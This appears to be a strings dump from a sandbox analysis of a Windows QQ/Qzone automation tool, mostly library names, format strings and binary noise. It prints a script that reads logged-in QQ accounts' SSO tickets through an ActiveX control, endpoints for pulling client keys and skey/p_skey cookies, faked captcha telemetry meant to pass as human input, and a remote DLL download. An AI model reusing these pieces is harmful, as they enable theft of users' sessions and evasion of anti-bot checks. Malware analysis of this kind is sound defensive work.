var keyUpCnt = 4;

var tokenid=Math.floor(Math.random()*2067831491 3565063022);

var ip=Math.floor(Math.random()*245 10);

var t1 = Math.floor(new Date().getTime() / 1000);

var endtime = new Date().getTime();

endtime = Math.floor(endtime / 1000);

var focusBlur_t = Math.floor(Math.random() * 980   1469);

var m_x = 238   Math.floor(Math.random() * 5   1);

var m_y = 141   Math.floor(Math.random() * 5   1);

var m_x1 = 179   Math.floor(Math.random() * 5   1);

var m_y1 = 280   Math.floor(Math.random() * 5   1);

var data = '{"mousemove":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '},{"t":'   t2   ',"x":'   m_x1   ',"y":'   m_y1   '}],"mouseclick":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '}],"keyvalue":['   t1   ','   t1   ','   t3   ','   t3   '],"user_Agent":"safari/601.1","resolutionx":375,"resolutiony":667,"winSize":[375,667],"url":"hXXp://captcha.qq.com/cap_union_new_show","refer":"hXXp://ui.ptlogin2.qq.com/cgi-bin/login","begintime":'   begintime   ',"endtime":'   endtime   ',"platform":2,"os":"IOS","keyboards":4,"flash":0,"pluginNum":0,"index":'   code_cnt1   ',"ptcz":"","tokenid":'   tokenid   ',"btokenid":null,"tokents":'   begintime   ',"ips":{"in":["'   ip   '"]},"colorDepth":24,"cookieEnabled":true,"timezone":8,"wDelta":0,"keyUpCnt":'   keyUpCnt   ',"keyUpValue":['   t1   ','   t1   ','   t3   ','   t3   '],"mouseUpValue":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '},{"t":'   t2   ',"x":'   m_x1   ',"y":'   m_y1   '}],"mouseUpCnt":'   mouseUpCnt   ',"mouseDownValue":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '},{"t":'   t2   ',"x":'   m_x1   ',"y":'   m_y1   '}],"mouseDownCnt":'   mouseUpCnt   ',"orientation":[{"x":0,"y":0,"z":0},{"x":0,"y":0,"z":0}],"bSimutor":0,"focusBlur":{"in":['   focusBlur_in   '],"out":['   focusBlur_in   '],"t":['   focusBlur_t   ']},"fVersion":0,"charSet":"UTF-8","resizeCnt":0,"errors":[],"screenInfo":"375-667-667-24-*-*-*","elapsed":0,"clientType":"1","refreshcnt":'   code_cnt   ',"trycnt":'   code_cnt1   ',"jshook":4}';

keyUpCnt  = 4;

&password=

&softkey=

Content-Disposition: form-data; name="password"

{pass}

Content-Disposition: form-data; name="softkey"

{softkey}

Content-Disposition: form-data; name="image"; filename="System.Byte[]"

0L.xJ;?

%SHK-

[t%X_^Iy

.NW4u3

5H\UWSSHh

-FG9}<!

.Be$>;

-9Bh}

%UOel

/|$LHlha%%d

(#\M.XG>

,t.aiM

q%C((2

.vr!L

WudP

}DQW%d

M.He2

A.DNE

.tt-[R

,.NPgw

.ATi,O.l<J

WWo

-p.Az

~*k.HF

&A.tCDHPD

^.JYo4p$_r0(hT

YuI%U

^.uL/.#

UUYPC.zjX

o.kwFt

<.SB

(v.Et

%uA.<0

kernel32.dl

greport

&.exe

w%D.D0

N^NO.Oy

BHH9y.9@JJp.9y.LL

%d&&'

''&%$$#""!!

!D@%D*

%*.*f

/CmdTar

D<4,.UNLINK

I>.HLPq,

T%softw

b.MSVCR

h'.vDqf

*WS^*.* G1

EH%s<

.vZ{$7

%s:%d

Eh.dE7

CxZ%c

keyw

VUITaSMTP

.ndA)

//oGl.chs\

=l.nG

.QuiI

7.evs%k

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD

comdlg32.dll

RASAPI32.dll

WINMM.dll

WINSPOOL.DRV

ShellExecuteA

SetClientCertificate

25325900

tencent://message/?uin=10347904&Site=éª¨å¤´å·¥ä½œå®¤&Menu=yes

hXXp://VVV.gutou.cc/up/tongji.htm#miaozan

hXXp://vip.gutou.cc/sale.php#tag41

123456789

00003333

1.2.18

?456789:;<=

!"#$%&'()* ,-./0123

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

windows

MSWHEEL_ROLLMSG

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

MPR.dll

VERSION.dll

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.avi)|*.avi

RICHED32.DLL

RICHED20.DLL

WPFT532.CNV

WPFT632.CNV

EXCEL32.CNV

write32.wpc

Windows Write

mswrd632.wpc

Word for Windows 6.0

wword5.cnv

Word for Windows 5.0

mswrd832.cnv

mswrd632.cnv

Word 6.0/95 for Windows & Macintosh

html32.cnv

keywords

\u00%c%c

json_tokener_parse_ex: error %s at offset %d

json_tokener_comment: %s

HTTP HTTPS.

Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.536.2 Safari/534.10

Content-Length: %d

VVV.dywt.com.cn

(*.htm;*.html)|*.htm;*.html

.PAVCResourceException@@

%d-%d-%d

%Y-%m-%d

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.jpg;*.bmp;*.gif;*.ico;*.cur|JPG

(*.JPG)|*.jpg|BMP

(*.BMP)|*.bmp|GIF

(*.GIF)|*.gif|

(*.ICO)|*.ico|

(*.CUR)|*.cur||

[%s:%d]

Range: bytes=%s-

[%s:%d]

PASS %s

PASS ******

USER %s

E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp

SIZE %s

PORT

User-Agent: %s

Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Referer: %s

GET %s HTTP/1.1

HTTP/1.0

Cookie: %s

%d, %s

\\192.168.0.129\TCP\1037

NSPlayer/9.0.0.2980; {%s}; Host: %s

rmff_fix_header: assuming data.size=%i

rmff_fix_header: assuming data.num_packets=%i

rmff_fix_header: assuming prop.num_packets=%i

rmff_fix_header: setting prop.data_offset from %i to %i

rmff_fix_header: correcting prop.num_streams from %i to %i

rmff_fix_header: correcting prop.size from %i to %i

%s %s %s

Session: %s

Cseq: %u

%*s %s

%*s %u

CSeq: %u

rtsp://%s:%i

rtsp://%s:%i/%s

ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586

GUID: 00000000-0000-0000-0000-000000000000

[%s:%d]

User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)

Range: npt=%s-

%s/streamid=1

%s/streamid=0

Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play

If-Match: %s

RealChallenge2: %s, sd=%s

Title: %s

Copyright: %s

Author: %s

real: Content-length for description too big (> %uMB)!

Require: com.real.retain-entity-for-setup

SupportsMaximumASMBandwidth: 1

Bandwidth: %u

Challenge1: %s

hash output: %x %x %x %x

hash input: %x %x %x %x

stream=%u;rule=%u,

Illegal character '%c' in input.

;3 #>6.&

'2, / 0&7!4-)1#

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCOleException@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

right-curly-bracket

left-curly-bracket

0123456789

C:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

WinExec

RegCreateKeyExA

GetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

CreateDialogIndirectParamA

EnumChildWindows

GetKeyState

HttpEndRequestA

HttpAddRequestHeadersA

InternetCrackUrlA

n.j.zO

.WOr'

.nMD"O

%Su?e

dK*%X

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>

AVIFIL32.dll

oledlg.dll

2013, 7, 15, 5

FastVerCode.DLL

CCaptchaRecognizer::recognizeByCodeTypeAndUrl

hXXp://s1.uudati.com:

hXXp://s1.taskok.com:

hXXp://s1.uudama.com:

hXXp://s1.uuwise.com:

/Api/config.aspx

2.0.0.5

WiseClientAPI-2.0.0.5

CCaptchaRecognizer::__UpdateTKEY

CCaptchaRecognizer::_IsNeedLogin

/Api/DecodeImg.aspx

xxxxxxxxxxx

hXXp://p1.uuwise.net:

hXXp://p1.uudama.net:

hXXp://p1.taskok.com:

hXXp://p1.uuwise.com:

hXXp://p1.uudama.com:

CCaptchaRecognizer::easyRecognizeUrl

%d%d%d%d%d

CCaptchaRecognizer::_CalcRandomPort

/Api/VerifyAPIFile.aspx

/Api/UserLogin.aspx

CCaptchaRecognizer::login

/Api/UserReg.aspx

/Api/PayCard.aspx

/Api/ReportError.aspx

CCaptchaRecognizer::reportError

/Api/UserPoint.aspx

|2.0.0.5|

/Api/DecodeResult.aspx

ID/KEY/

ByTypeBytes.JPG

CHttpRequestHelper::_ReadResponse

User-Agent:WiseClient-2.0.0.5;

WiseClient-2.0.0.5

CHttpRequestHelper::_InternalRequest

CHttpRequestHelper::RequestGetImage

CHttpRequestHelper::RequestPost

ServerPort

UUExtConfig.ini

-:-:-.%d

tCRYPTDLL.DLL

3.cn.pool.ntp.org

2.cn.pool.ntp.org

1.cn.pool.ntp.org

0.cn.pool.ntp.org

cn.pool.ntp.org

\\.\PHYSICALDRIVE0

Microsoft Windows Millennium Edition

Microsoft Windows 98

Microsoft Windows 95

%s (Build %d)

Service Pack 6a (Build %d)

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009

Web Edition

Service Pack %d (Build %d)

Microsoft Windows NT

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003,

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 "R2"

Windows Server 2008

Windows Vista

Windows Server 2008 R2

Windows 7

ox-x-x-x-x-x

\Tencent\Users\*.*

nKERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

!"#$%&'()* ,-.

UUWiseHelper.dll

uuwise.com

2, 0, 0, 5

1.0.0.1

!"#$%&'()* ,-

24, 0, 0, 1

hXXp://VVV.sz789.net/

Windows

1, 0, 6, 6

- Skin.dll

1.0.0.0

Bugreport

(*.*)

Grid.Document

%original file name%.exe_3796_rwx_00401000_003DD000:

t%SVh

t$(SSh

~%UVW

}?9\$0~9

u$SShe

kku2.iu

/wK(.wS

kernel32.dll

advapi32.dll

wininet.dll

oleaut32.dll

Kernel32.dll

atl.dll

ole32.dll

shlwapi.dll

user32.dll

data\lz.dll

data\uu.dll

data\dc.dll

dbghelp.dll

ntdll.dll

gdiplus.dll

GdiPlus.dll

Ole32.dll

GetProcessHeap

RegOpenKeyA

RegEnumKeyA

RegCloseKey

RegOpenKeyExA

MsgWaitForMultipleObjects

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

uu_loginA

ReportError

uu_reportError

SetWindowsHookExA

UnhookWindowsHookEx

EnumWindows

GdiplusShutdown

CreateIoCompletionPort

{B6F7542F-B8FE-46a8-9605-98856A687097}

42305932-06E6-47a5-AC79-8BDCDC58DF61

HttpClient

1970-1-1 00:00:01

001A2B3C4D5Ec:\kss.ini

SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\

ServiceName\\.\

2u.eKITFBp

hXXp://y.gutousoft.com/sale.php#tag41

(*.bmp;*.dib;*.jpg;*.jpg;*.jpeg;*.jpe;*.jfif;*.gif;*.tif;*.tiff;*.png)|*.bmp;*.dib;*.jpg;*.jpeg;*.jpe;*.jfif;*.gif;*.tif;*.tiff;*.png|GIF

(*.gif;*.tif;*.tiff)|*.gif;*.tif;*.tiff|PNG

(*.png)|*.png|JPG

(*.jpg;*.jpeg;*.jpe;*.jfif)|*.jpeg;*.jpe;*.jfif|BMP

(*.bmp;*.dib)|*.bmp;*.dib|

(*.*)|*.*

12.5.3

hXXp://d.gutousoft.com/å…¬å…±è½¯ä»¶ä¸‹è½½/ç§’è¯„ç§’èµž.txt

hXXp://

sale.php?

sale.php#

hXXp://vip.gutou.cc

vip.gutou.cc

hXXps://

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

@https

hXXp://y.gutousoft.com

y.gutousoft.com

\data\error.ini

hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=http://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=

&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

hXXp://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.

nickname

hXXp://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=

clientkey=

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

pgv_pvi=; pgv_si=; _qpsvr_localtk=; pgv_pvid=; pgv_info=ssid=; pt2gguin=; uin=; skey=; ptisp=; RK=; ptcz=; p_uin=; p_skey=; pt4_token=; Loading=; QZ_FE_WEBP_SUPPORT=; cpu_performance_v8=

hXXp://user.qzone.qq.com/

hXXp://user.qzone.qq.com/88882222

.substr(

hXXp://qzone.qq.com/

location = 'url'

hXXps://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msgdetail_v6?uin=

hXXp://h5.qzone.qq.com/proxy/domain/taotao.qzone.qq.com/cgi-bin/emotion_cgi_delcomment_ugc?g_tk=

qzreferrer=http://user.qzone.qq.com/

hXXps://h5.qzone.qq.com/proxy/domain/ic2.qzone.qq.com/cgi-bin/feeds/cgi_get_feeds_count.cgi?uin=

,nick:'

login

skey=

p_skey=

; skey=

hXXps://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=

msglist

&scope=0&view=1&daylist=&uinlist=&gid=&flag=1&filter=all&applist=all&refresh=0&aisortEndTime=0&aisortOffset=0&getAisort=0&aisortBeginTime=0&pagenum=1&externparam=&firstGetGroup=0&icServerTime=0&mixnocache=0&scene=0&begintime=0&count=10&dayspac=0&sidomain=qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&rd=0.

hXXps://h5.qzone.qq.com/proxy/domain/ic2.qzone.qq.com/cgi-bin/feeds/feeds3_html_more?uin=

nickname:'

data-curkey=\x22

data-unikey=\x22

key:'

hXXp://user.qzone.qq.com/

&curkey=

&unikey=

hXXp://h5.qzone.qq.com/proxy/domain/w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=

p_skey

hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA5NDc0MF80MzUxMjhfODAwMDk0NzQwXzJf

\data\yzm.jpg

hXXp://m.gutousoft.com/yzm/getsoft.php

\data\lz.dll

.text

`.rdata

@.data

.rsrc

@.reloc

NETAPI32.dll

MFC42.DLL

MSVCRT.dll

KERNEL32.dll

USER32.dll

SHLWAPI.dll

WININET.dll

FastVerCode.dll

.PAVCObject@@

.PAVCException@@

.PAVCFileException@@

.PAVCInternetException@@

Content-Disposition: form-data; name="key"

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN)

POST /api.php?mod=yzm&act=state HTTP/1.1

/api.php?mod=yzm&act=state

LZConfig.ini

User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)

HTTP/1.1

/api.php?mod=yzm&act=add

POST /api.php?mod=yzm&act=result HTTP/1.1

/api.php?mod=yzm&act=result

POST /api.php?mod=yzm&act=point HTTP/1.1

/api.php?mod=yzm&act=point

POST /api.php?mod=yzm&act=register HTTP/1.1

/api.php?mod=yzm&act=register

dama3.hyslt.com

POST /api.php?mod=dmuser&act=yzm_error HTTP/1.1

/api.php?mod=dmuser&act=yzm_error

.hyslt.com

XXXXXX

hXXp://ip.qq.com/

POST /api.php?mod=yzm&act=server HTTP/1.1

/api.php?mod=yzm&act=server

7r7S7

9D62354B-2079-4449-A366-31997628A532

\data\uu.dll

SSSSh

ByScreen.JPG

operator

GetProcessWindowStation

E:\work\UUWiseHelper

\UUWiseHelper.pdb

GDI32.dll

RegOpenKeyExW

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

urlmon.dll

IPHLPAPI.DLL

WS2_32.dll

GetCPInfo

UUWiseHelper.DLL

uu_easyRecognizeUrlA

uu_easyRecognizeUrlW

uu_loginW

uu_recognizeByCodeTypeAndUrlA

uu_recognizeByCodeTypeAndUrlW

zcÁ

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

"0,01070

88J8R8x8

0#0'0-01070;0

=*>0>4>8><>

5%6S6

3$3,383\3|3

hXXp://api.ruokuai.com/register.xml

hXXp://api.ruokuai.com/info.xml

hXXp://api.ruokuai.com/recharge.xml

hXXp://api.ruokuai.com/create.xml

hXXp://api.ruokuai.com/reporterror.xml

\data\dc.dll

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

WSOCK32.dll

MSVCP60.dll

dc.dll

ReportError_A

VBYB_ReportError

VB_ReportError

debug.ini

ReportError:%s

Error:%s

%s|!|%s

\dms.pdb

%u%u,

dclog.txt

port

settimeout:%d

[%d]%s

reg2:%s

checkok:%s %s

check fail:%s %s %s

check:%s %s

getcjfail:%s %s

getcj:%s %s

%s%uout

%s%uin

put img ok:%s

put img fail:%s

put img:%s %s %d

get result ok:%s,%s

get result fail:%s

get result:%s

notifyfail ok:%s

notifyfail fail:%s,%s

notifyfail:%s

getimgok:%s,%s

getimg:%s

getinfo fail:%s

getinfo:%s,%s

setresult:%s,%s

HTTP/1.1 200 OK

recv:%d

send:%d

GET /ip.txt HTTP/1.1

Host: %s

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2

select:%d

ioctlsocket:%d

socket:%d

api.qqchaoren.net

14.17.65.24

14.17.65.23

dama2.qqchaoren.net

dama1.qqchaoren.net

connect total:%s %d

:%s %d

connect discard:%s %d

[d-d-d d:d:d](u)

recv timeout:<%d>

recvfail:<%d>%d

server close:<%d>%d

recv:<%d>%d

send:<%d>%d

sendfail:<%d>%d

connect timeout:<%d>

connectok:<%d>%s %hu

127.0.0.1

1.1.3

1'1,1<1]2

9 9$9(9,9094989<9

hXXp://m.gutousoft.com/yzm/reportosft.php?card=&id=

hXXp://h5.qzone.qq.com/proxy/domain/taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=

hXXp://h5.qzone.qq.com/proxy/domain/b1.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=

/infocenter?ptsig=&topicId=

hXXp://h5.qzone.qq.com/proxy/domain/photo.qq.com/cgi-bin/common/cgi_add_piccomment_v2?g_tk=

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?g_tk=

/main&topicId=

/myhome

&richtype=1&private=0¶mstr=1&qzreferrer=http://user.qzone.qq.com/

,nick:}

; p_skey=

Content-Disposition: form-data; name="skey"

skey

1.jpg

Content-Disposition: form-data; name="filename"; filename="1.jpg"

Content-Disposition: form-data; name="zzpanelkey"

Content-Disposition: form-data; name="p_skey"

Content-Disposition: form-data; name="backUrls"

hXXp://upbak.photo.qzone.qq.com/cgi-bin/upload/cgi_upload_image,hXXp://119.147.64.75/cgi-bin/upload/cgi_upload_image

Host: shup.photo.qzone.qq.com

hXXp://shup.photo.qzone.qq.com/cgi-bin/upload/cgi_upload_image?g_tk=

</url>

<url>

&dayspac=0&sidomain=qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&rd=0.

hXXp://r.qzone.qq.com/cgi-bin/tfriend/getfriendmsglist.cgi?uin=

&msgTime=

&flag=100&key=

1970-01-01 08:00:00

\data\setsoft.ini

\update.exe

MSXML2.XMLHTTP

Microsoft.XMLHTTP

Can't create XMLHTTP connection object

Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)

application/x-www-form-urlencoded

errmsg_s

Comet.WndShadow

Comet.WndShadow.Color

Comet.WndShadow.Size

Comet.WndShadow.Proc

SysShadow

*.txt

skey=@[A-Za-z0-9]{3,};

skey=@[A-Za-z0-9]{3,};

(*.txt)|*.txt|

hXXp://VVV.gutou.cc/up/tongji.htm#

Bugreport

VBScript.RegExp

:|:czkey:|:

update.temp

b@.bak

password

x.yvr

x.yvkd

C:\Windows\

C:\Windows\bd.d

hXXp://m.gutousoft.com/yzm/bd.dll

1,2,5,6,7,8,11,12,21,51

\.pL.

Windows

0,8999($

.SCK_LINES/9

.jJ^\

.ERZDLL$

%fLH^A

n.ef"

g%s_%d

=.Xh"

.Hjsp"

ANSI_CHARSE.Dc

O7E(AL("%s

KeywnF

.cu%t

\-ú

.NDFR8P

 Ix.Lv?h]#

keysK<

A.DHq*-

8X%Fx

L.@%u

.QunW

.da]o

.PP`

.pas8

6.Pob

oOV?.DD@

.ChS-v

#yfP.re

KERNEL32.DLL

comctl32.dll

gdi32.dll

version.dll

wsock32.dll

rsadll.dll

\data\Gutou.ini

gutousoft.com

gutou.cc

A1yWwtUixtgj9gnDMUUISlY0Elm8fH2Xgwng3ro8MHs4og5BmZdt1cHkSAPX8sFDiVmkLp1Ycv1jfxGNX2yKK3sDQUaNBKmRPOwh3ngD6czrytZsBRY6yejy6Wmb8OUYbflN lZmF02OBWfFnDhtvlgfXgOfZXzu0yjgCZzjBdK0IOdNU5VBmnEg9b1puMo0Rt/rGCRZAsdYymSpqPVD8WFsUWPySk2AefWYtQ3NFju tAYVIWIqmtpwScK5hOfXSXiCk0jthyk/1MHMmBqRZm4NUoVSP29U8NURhC9qmD9GYB/o9Vn9BSenpsyHXDDAcX72zEbn2RDQqD0l4gabn/pPllB7nDOXRfnMAxHmUUYxvHCtPIYLDRRg25YDjAsMZqCOLQS tZU/ vw65PgpPiPHC A9KqsCCVrYwwFcjhEMc9bP25esSGERNX5v8WlsREOrfY9/saOV3g8mUQ/FMzqokUtFQ3mGSPlOWmbCx66iB/zl7GJC0v1sduP0m6z1kv2clHSrkD5N0z VnTfhcf565o D0anX1RaJFcpMFvZTxyhupBG8GfYyCjfaARXZUgNV97faSX63T 1RcxTKUJ78hc9Wpr54Ud4y6svK9/jk5DUTcMULHO4yUNI aneNgGrXRK/i4fidArJqtkc5mYNTJCBAXrKERMojnFwpliUq9C6s6 LPIwB/5Yns/E0cpFp4Ep0/CZ lmiO5vdS1soFKXTVieYESplJ 9p28UWbOew9U6ZLTxNijwA3W7SHuT/5rekE5m3atcpLbpZff6ZMylNsdzyx8TF16vo VLXGdCX/3577uo8kdeHLHwBFLVoOh7SqxZFMDr5lkW/3XiTiL3TNmpZ4Vh1nhMqQEek8YMGcGStfN0mI23abFInwLmjV6N/PLM19Zprpi4nVM22X47VlGUeVNjk jKcNsBLSnGkdVtv55YEvNVMtDRYEqvZ1GLY0CTnzWThMxz6nJfJBLmLraBTgj1wpLiW5FU2rlf2LCuI4tB0/N1iNreMvHXgYhDZtZ2p2wpo tFDgx5ZyHsFSnSWh99Bt99gAWe0TCosnqlPSERGT4bXhhlzYzgZ18w5voJ8NM6kZnFTJ8zcnpVWcPpw2PnSuzoNElUq4C hLmj7r Tl fOL8OIPr/z0KpySnOT2U1OxvnZnc7hP2CWMrNfFt8r9bpZlf0RkFtT4sG1/7zJRC6El6m9KrHPtQtn8v8ESuQZ8t04rYsgKNWsHJD7vXF8z8iT4WcuCEhYCwn SPh487i6XS0USOWDZBVk6FVPQYv9 kEK98L8cV90Ty UYCVw8wCe54y5OmzOoz7Pl/Ea9Z7f7FN7Ke3EobpW5c20PdYstl7XEufeEwwripsre6FiYKRFlElw onXZay/mfYawx32N/F0keF046qkNip3vfg/tSg2P2CFcsWWkzrqResw3aOw MP 2yE3WnkcknIWk7Qo6TLhByvq/LJ6UF8iv7Z4TMynvu2rYK5FG1uJw7qqXPeoISPFT7a6UPhnJM3rPDTvk/utz2vAtgwGXXoqysDIGa 1i4fwRo0QLN46ovlyzciWOq9GndGZuPi8DN30xEN2En/J rAlf2QADqPJZP1m/LgjYVA7Ekqhru wtbYYspEaIigvx7nNDdm6ZqXIw4NBlZvPW1XHW7/t7jyyebT7aecpBWF F60PCPinI9yfhe6HIQAjBI=

%S4WD

hg%fpM

S.Ac9SR

0.I%3s

,wAe.kI

aiUy'4xu

%c*@j

.eH'y

{&%U)

lj%4U

xe%CNs

9F.cLe

hJK.ZH

O.qt0

COMCTL32.dll

MSIMG32.dll

MSVFW32.dll

SkinH_EL.dll

X@.gif

hXXp://ctc.qzonestyle.gtimg.cn/qzone/em/e

M@hXXp://ctc.qzonestyle.gtimg.cn/aoi/img/shuoshuo/emo/e10000

.AVVV.gutou.cc/?dengluqi

hXXp://VVV.gutou.cc

@@hXXp://gutou.cc

anonymous@123.com

.exe|.rar|.zip|.gif|.jpg|.mp3|.rm

hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&pt_qr_app=

&pt_qr_link=http://z.qzone.com/download.html&self_regurl=https://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html&pt_no_auth=0

pt_login_sig=

login_sig:"

&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&r=0.

&appid=549000912&js_ver=10217&js_type=1&login_sig=

hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=

hXXps://ssl.captcha.qq.com/cap_union_new_gettype?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&uid=

hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

websig:"

websig

hXXps://ssl.captcha.qq.com/cap_union_new_getcapbysig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=

